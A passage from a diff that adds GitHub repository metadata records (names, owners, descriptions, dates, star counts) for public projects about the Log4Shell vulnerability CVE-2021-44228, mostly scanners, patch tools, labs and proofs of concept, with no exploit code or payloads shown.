+ "updated_at": "2021-12-31T13:32:41Z", + "pushed_at": "2022-03-29T21:43:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439595430, + "name": "scan-log4shell", + "full_name": "suniastar\/scan-log4shell", + "owner": { + "login": "suniastar", + "id": 19646660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19646660?v=4", + "html_url": "https:\/\/github.com\/suniastar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/suniastar\/scan-log4shell", + "description": "A scanning suite to find servers affected by the log4shell flaw (CVE-2021-44228) with example to test it", + "fork": false, + "created_at": "2021-12-18T11:16:06Z", + "updated_at": "2024-11-09T23:59:37Z", + "pushed_at": "2021-12-18T15:54:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439596852, + "name": "log4jvulnerability-CVE-2021-44228", + "full_name": "shivakumarjayaraman\/log4jvulnerability-CVE-2021-44228", + "owner": { + "login": "shivakumarjayaraman", + "id": 63054448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63054448?v=4", + "html_url": "https:\/\/github.com\/shivakumarjayaraman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shivakumarjayaraman\/log4jvulnerability-CVE-2021-44228", + "description": "An attempt to understand the log4j vulnerability by looking through the code", + "fork": false, + "created_at": "2021-12-18T11:23:35Z", + "updated_at": "2021-12-18T15:32:08Z", + "pushed_at": "2021-12-18T15:32:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439612080, + "name": "CVE-2021-44228-PoC", + "full_name": "j3kz\/CVE-2021-44228-PoC", + "owner": { + "login": "j3kz", + "id": 6310563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6310563?v=4", + "html_url": "https:\/\/github.com\/j3kz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j3kz\/CVE-2021-44228-PoC", + "description": "Self-contained lab environment that runs the exploit safely, all from docker compose", + "fork": false, + "created_at": "2021-12-18T12:42:04Z", + "updated_at": "2021-12-18T14:08:28Z", + "pushed_at": "2021-12-18T14:08:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439658571, + "name": "log4j-pcap-activity", + "full_name": "Apipia\/log4j-pcap-activity", + "owner": { + "login": "Apipia", + "id": 17787069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17787069?v=4", + "html_url": "https:\/\/github.com\/Apipia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Apipia\/log4j-pcap-activity", + "description": "A fun activity using a packet capture file from the log4j exploit (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-18T16:09:49Z", + "updated_at": "2022-10-18T10:59:33Z", + "pushed_at": "2021-12-18T16:51:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439698618, + "name": "log4shell-docker-lab", + "full_name": "axelcurmi\/log4shell-docker-lab", + "owner": { + "login": "axelcurmi", + "id": 23001923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23001923?v=4", + "html_url": "https:\/\/github.com\/axelcurmi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/axelcurmi\/log4shell-docker-lab", + "description": "Log4Shell (CVE-2021-44228) docker lab", + "fork": false, + "created_at": "2021-12-18T19:30:35Z", + "updated_at": "2022-01-05T14:55:14Z", + "pushed_at": "2021-12-24T10:28:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439712818, + "name": "log4j-2021-vulnerability-study", + "full_name": "otaviokr\/log4j-2021-vulnerability-study", + "owner": { + "login": "otaviokr", + "id": 3641421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3641421?v=4", + "html_url": "https:\/\/github.com\/otaviokr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/otaviokr\/log4j-2021-vulnerability-study", + "description": "This is a showcase how the Log4J vulnerability (CVE-2021-44228) could be explored. This code is safe to run, but understand what it does and how it works!", + "fork": false, + "created_at": "2021-12-18T20:53:06Z", + "updated_at": "2022-01-22T01:46:53Z", + "pushed_at": "2022-01-22T01:46:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439769164, + "name": "log4j_CVE-2021-44228", + "full_name": "kkyehit\/log4j_CVE-2021-44228", + "owner": { + "login": "kkyehit", + "id": 53825723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53825723?v=4", + "html_url": "https:\/\/github.com\/kkyehit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkyehit\/log4j_CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2021-12-19T03:47:54Z", + "updated_at": "2021-12-19T03:54:50Z", + "pushed_at": "2021-12-19T03:54:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439771479, + "name": "inspec-log4j", + "full_name": "trickyearlobe\/inspec-log4j", + "owner": { + "login": "trickyearlobe", + "id": 3001322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3001322?v=4", + "html_url": "https:\/\/github.com\/trickyearlobe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trickyearlobe\/inspec-log4j", + "description": "An Inspec profile to check for Log4j CVE-2021-44228 and CVE-2021-45046", + "fork": false, + "created_at": "2021-12-19T04:04:57Z", + "updated_at": "2022-05-11T09:35:20Z", + "pushed_at": "2021-12-19T05:29:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439780948, + "name": "Log4J-Simulation-Tool", + "full_name": "TheInterception\/Log4J-Simulation-Tool", + "owner": { + "login": "TheInterception", + "id": 58417506, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58417506?v=4", + "html_url": "https:\/\/github.com\/TheInterception", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheInterception\/Log4J-Simulation-Tool", + "description": "Vulnerability analysis, patch management and exploitation tool forCVE-2021-44228 \/ CVE-2021-45046 \/ CVE-2021-4104", + "fork": false, + "created_at": "2021-12-19T05:13:25Z", + "updated_at": "2023-08-15T12:50:36Z", + "pushed_at": "2021-12-25T01:51:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "attackvector", + "cyber-security", + "ethical-hacking", + "network-analysis", + "redteam" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439803220, + "name": "Get-log4j-Windows-local", + "full_name": "KeysAU\/Get-log4j-Windows-local", + "owner": { + "login": "KeysAU", + "id": 38932932, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38932932?v=4", + "html_url": "https:\/\/github.com\/KeysAU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KeysAU\/Get-log4j-Windows-local", + "description": "Identifying all log4j components across on local windows servers. CVE-2021-44228", + "fork": false, + "created_at": "2021-12-19T07:35:01Z", + "updated_at": "2022-10-28T18:51:03Z", + "pushed_at": "2021-12-19T08:09:11Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439839460, + "name": "Log4Shell-demo", + "full_name": "mschmnet\/Log4Shell-demo", + "owner": { + "login": "mschmnet", + "id": 11050119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11050119?v=4", + "html_url": "https:\/\/github.com\/mschmnet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mschmnet\/Log4Shell-demo", + "description": "Demo to show how Log4Shell \/ CVE-2021-44228 vulnerability works", + "fork": false, + "created_at": "2021-12-19T10:57:16Z", + "updated_at": "2022-10-14T01:29:51Z", + "pushed_at": "2021-12-23T11:59:53Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 439882882, + "name": "Log4j_scan_Advance", + "full_name": "Rk-000\/Log4j_scan_Advance", + "owner": { + "login": "Rk-000", + "id": 72359463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72359463?v=4", + "html_url": "https:\/\/github.com\/Rk-000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rk-000\/Log4j_scan_Advance", + "description": "A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228", + "fork": false, + "created_at": "2021-12-19T14:20:54Z", + "updated_at": "2024-03-21T12:57:10Z", + "pushed_at": "2021-12-19T14:23:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439889436, + "name": "Log4jCenter", + "full_name": "puzzlepeaches\/Log4jCenter", + "owner": { + "login": "puzzlepeaches", + "id": 8538866, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8538866?v=4", + "html_url": "https:\/\/github.com\/puzzlepeaches", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puzzlepeaches\/Log4jCenter", + "description": "Exploiting CVE-2021-44228 in vCenter for remote code execution and more. ", + "fork": false, + "created_at": "2021-12-19T14:48:30Z", + "updated_at": "2024-10-29T16:57:04Z", + "pushed_at": "2021-12-22T15:56:21Z", + "stargazers_count": 103, + "watchers_count": 103, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 103, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 439931338, + "name": "log4shell-rmi-poc", + "full_name": "Labout\/log4shell-rmi-poc", + "owner": { + "login": "Labout", + "id": 28622593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28622593?v=4", + "html_url": "https:\/\/github.com\/Labout", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Labout\/log4shell-rmi-poc", + "description": "A Proof of Concept of the Log4j vulnerabilities (CVE-2021-44228) over Java-RMI", + "fork": false, + "created_at": "2021-12-19T17:53:31Z", + "updated_at": "2024-07-27T04:16:01Z", + "pushed_at": "2021-12-19T22:09:40Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440009725, + "name": "f-for-java", + "full_name": "TotallyNotAHaxxer\/f-for-java", + "owner": { + "login": "TotallyNotAHaxxer", + "id": 87203697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87203697?v=4", + "html_url": "https:\/\/github.com\/TotallyNotAHaxxer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TotallyNotAHaxxer\/f-for-java", + "description": "a project written in go and java i abandoned for CVE-2021-44228 try to fix it if you can XD", + "fork": false, + "created_at": "2021-12-20T01:31:06Z", + "updated_at": "2021-12-24T18:06:45Z", + "pushed_at": "2022-12-16T03:57:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440029288, + "name": "log4j2-exploit", + "full_name": "spasam\/log4j2-exploit", + "owner": { + "login": "spasam", + "id": 438507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/438507?v=4", + "html_url": "https:\/\/github.com\/spasam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spasam\/log4j2-exploit", + "description": "log4j2 Log4Shell CVE-2021-44228 proof of concept", + "fork": false, + "created_at": "2021-12-20T03:16:01Z", + "updated_at": "2021-12-21T18:32:07Z", + "pushed_at": "2021-12-20T03:19:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "log4j2", + "log4shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 440140065, + "name": "cve-2021-44228-log4j-test", + "full_name": "bumheehan\/cve-2021-44228-log4j-test", + "owner": { + "login": "bumheehan", + "id": 15325225, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15325225?v=4", + "html_url": "https:\/\/github.com\/bumheehan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bumheehan\/cve-2021-44228-log4j-test", + "description": null, + "fork": false, + "created_at": "2021-12-20T11:07:21Z", + "updated_at": "2021-12-22T04:27:08Z", + "pushed_at": "2021-12-22T04:27:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 440154999, + "name": "log4j-dork-scanner", + "full_name": "cergo123\/log4j-dork-scanner", + "owner": { + "login": "cergo123", + "id": 41321155, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41321155?v=4", + "html_url": "https:\/\/github.com\/cergo123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cergo123\/log4j-dork-scanner", + "description": "A script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks", + "fork": false, + "created_at": "2021-12-20T12:01:52Z", + "updated_at": "2024-08-23T22:44:57Z", + "pushed_at": "2021-12-20T12:03:48Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "dork-scanner", + "log4j", + "python-script", + "scanner" + ], + "visibility": "public", + "forks": 7, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 440177006, + "name": "log4shell-war-fixer", + "full_name": "dmitsuo\/log4shell-war-fixer", + "owner": { + "login": "dmitsuo", + "id": 1348764, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1348764?v=4", + "html_url": "https:\/\/github.com\/dmitsuo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dmitsuo\/log4shell-war-fixer", + "description": "Shell script to remove JndiLookup class from Log4J 2 jar file, inside WAR file, in order to mitigate CVE-2021-44228, a.k.a., #Log4Shell", + "fork": false, + "created_at": "2021-12-20T13:18:57Z", + "updated_at": "2021-12-20T19:21:49Z", + "pushed_at": "2021-12-20T16:04:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-44228", + "log4j", + "log4shell" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440183835, + "name": "Log4jShell-Scan", + "full_name": "Y0-kan\/Log4jShell-Scan", + "owner": { + "login": "Y0-kan", + "id": 96424613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96424613?v=4", + "html_url": "https:\/\/github.com\/Y0-kan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y0-kan\/Log4jShell-Scan", + "description": "log4j2 RCE漏洞(CVE-2021-44228)内网扫描器,可用于在不出网的条件下进行漏洞扫描,帮助企业内部快速发现Log4jShell漏洞。", + "fork": false, + "created_at": "2021-12-20T13:41:35Z", + "updated_at": "2023-12-06T02:42:38Z", + "pushed_at": "2021-12-21T06:11:58Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 36, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 440216413, + "name": "Log4j-Scanner-Exploit", + "full_name": "julian911015\/Log4j-Scanner-Exploit", + "owner": { + "login": "julian911015", + "id": 26369589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26369589?v=4", + "html_url": "https:\/\/github.com\/julian911015", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/julian911015\/Log4j-Scanner-Exploit", + "description": "Script en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota.", + "fork": false, + "created_at": "2021-12-20T15:22:50Z", + "updated_at": "2024-09-19T08:09:04Z", + "pushed_at": "2024-09-03T15:22:31Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 440220972, + "name": "CVE-2021-44228---detection-with-PowerShell", + "full_name": "intel-xeon\/CVE-2021-44228---detection-with-PowerShell", + "owner": { + "login": "intel-xeon", + "id": 37773731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37773731?v=4", + "html_url": "https:\/\/github.com\/intel-xeon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/intel-xeon\/CVE-2021-44228---detection-with-PowerShell", + "description": null, + "fork": false, + "created_at": "2021-12-20T15:38:07Z", + "updated_at": "2021-12-23T13:23:27Z", + "pushed_at": "2022-06-24T08:00:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440221338, + "name": "log4j-fix-CVE-2021-44228", + "full_name": "chandru-gunasekaran\/log4j-fix-CVE-2021-44228", + "owner": { + "login": "chandru-gunasekaran", + "id": 87476739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87476739?v=4", + "html_url": "https:\/\/github.com\/chandru-gunasekaran", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chandru-gunasekaran\/log4j-fix-CVE-2021-44228", + "description": "Windows Batch Scrip to Fix the log4j-issue-CVE-2021-44228", + "fork": false, + "created_at": "2021-12-20T15:39:20Z", + "updated_at": "2023-09-18T10:37:49Z", + "pushed_at": "2021-12-23T09:19:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 440261792, + "name": "TekiumLog4jApp", + "full_name": "erickrr-bd\/TekiumLog4jApp", + "owner": { + "login": "erickrr-bd", + "id": 77643346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77643346?v=4", + "html_url": "https:\/\/github.com\/erickrr-bd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erickrr-bd\/TekiumLog4jApp", + "description": "Java application vulnerable to CVE-2021-44228", + "fork": false, + "created_at": "2021-12-20T17:59:56Z", + "updated_at": "2022-02-15T20:16:38Z", + "pushed_at": "2022-03-01T00:00:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "app", + "cve-2021-44228", + "docker", + "exploitation", + "java", + "jndi", + "log4j2", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440275278, + "name": "damn-vulnerable-log4j-app", + "full_name": "snapattack\/damn-vulnerable-log4j-app", + "owner": { + "login": "snapattack", + "id": 92945688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92945688?v=4", + "html_url": "https:\/\/github.com\/snapattack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snapattack\/damn-vulnerable-log4j-app", + "description": "Vulnerable web application to test CVE-2021-44228 \/ log4shell and forensic artifacts from an example attack", + "fork": false, + "created_at": "2021-12-20T18:51:52Z", + "updated_at": "2024-09-30T06:41:54Z", + "pushed_at": "2021-12-20T18:55:44Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 440373235, + "name": "loguccino", + "full_name": "sassoftware\/loguccino", + "owner": { + "login": "sassoftware", + "id": 5289877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5289877?v=4", + "html_url": "https:\/\/github.com\/sassoftware", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sassoftware\/loguccino", + "description": "Scan and patch tool for CVE-2021-44228 and related log4j concerns. ", + "fork": false, + "created_at": "2021-12-21T03:01:36Z", + "updated_at": "2024-05-15T16:42:25Z", + "pushed_at": "2022-01-24T16:43:41Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 34, + "score": 0, + "subscribers_count": 16 + }, + { + "id": 440408111, + "name": "apache-log4j2-CVE-2021-44228", + "full_name": "xx-zhang\/apache-log4j2-CVE-2021-44228", + "owner": { + "login": "xx-zhang", + "id": 47806549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47806549?v=4", + "html_url": "https:\/\/github.com\/xx-zhang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xx-zhang\/apache-log4j2-CVE-2021-44228", + "description": "相关的复现和文档", + "fork": false, + "created_at": "2021-12-21T06:03:18Z", + "updated_at": "2021-12-21T06:03:18Z", + "pushed_at": "2021-12-21T06:03:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 440439859, + "name": "Log4Shell-Scanner", + "full_name": "r00thunter\/Log4Shell-Scanner", + "owner": { + "login": "r00thunter", + "id": 33806985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33806985?v=4", + "html_url": "https:\/\/github.com\/r00thunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00thunter\/Log4Shell-Scanner", + "description": "Python script to detect Log4Shell Vulnerability CVE-2021-44228", + "fork": false, + "created_at": "2021-12-21T08:13:35Z", + "updated_at": "2021-12-21T08:15:05Z", + "pushed_at": "2021-12-21T08:15:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440555354, + "name": "log4j-spring-vuln-poc", + "full_name": "mn-io\/log4j-spring-vuln-poc", + "owner": { + "login": "mn-io", + "id": 4397504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4397504?v=4", + "html_url": "https:\/\/github.com\/mn-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mn-io\/log4j-spring-vuln-poc", + "description": "POC for CVE-2021-44228 within Springboot", + "fork": false, + "created_at": "2021-12-21T15:00:58Z", + "updated_at": "2022-02-24T22:15:47Z", + "pushed_at": "2021-12-22T08:58:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440601926, + "name": "log4j2-hack-springboot", + "full_name": "rejupillai\/log4j2-hack-springboot", + "owner": { + "login": "rejupillai", + "id": 15153045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15153045?v=4", + "html_url": "https:\/\/github.com\/rejupillai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rejupillai\/log4j2-hack-springboot", + "description": "Log4j2 CVE-2021-44228 hack demo for a springboot app", + "fork": false, + "created_at": "2021-12-21T17:40:02Z", + "updated_at": "2021-12-21T19:26:23Z", + "pushed_at": "2023-03-22T05:52:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 440663893, + "name": "log4j-cve-2021-44228", + "full_name": "lucab85\/log4j-cve-2021-44228", + "owner": { + "login": "lucab85", + "id": 24267107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24267107?v=4", + "html_url": "https:\/\/github.com\/lucab85", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lucab85\/log4j-cve-2021-44228", + "description": "Ansible detector scanner playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 Remote Code Execution - log4j (CVE-2021-44228)", + "fork": false, + "created_at": "2021-12-21T22:14:24Z", + "updated_at": "2024-07-07T09:47:47Z", + "pushed_at": "2022-01-10T19:13:04Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ansible", + "cve-2021-44228", + "devsecops", + "log4j", + "log4shell", + "security" + ], + "visibility": "public", + "forks": 9, + "watchers": 57, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 440722343, + "name": "Log4Shell-CVE-2021-44228-Demo", + "full_name": "BabooPan\/Log4Shell-CVE-2021-44228-Demo", + "owner": { + "login": "BabooPan", + "id": 16317991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16317991?v=4", + "html_url": "https:\/\/github.com\/BabooPan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BabooPan\/Log4Shell-CVE-2021-44228-Demo", + "description": "Log4Shell Demo with AWS", + "fork": false, + "created_at": "2021-12-22T03:34:40Z", + "updated_at": "2024-03-12T11:31:53Z", + "pushed_at": "2022-03-28T06:49:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440788757, + "name": "log4shell_sentinel", + "full_name": "ossie-git\/log4shell_sentinel", + "owner": { + "login": "ossie-git", + "id": 25382296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25382296?v=4", + "html_url": "https:\/\/github.com\/ossie-git", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ossie-git\/log4shell_sentinel", + "description": "A Smart Log4Shell\/Log4j\/CVE-2021-44228 Scanner", + "fork": false, + "created_at": "2021-12-22T08:35:04Z", + "updated_at": "2022-10-29T09:47:49Z", + "pushed_at": "2021-12-22T08:40:58Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 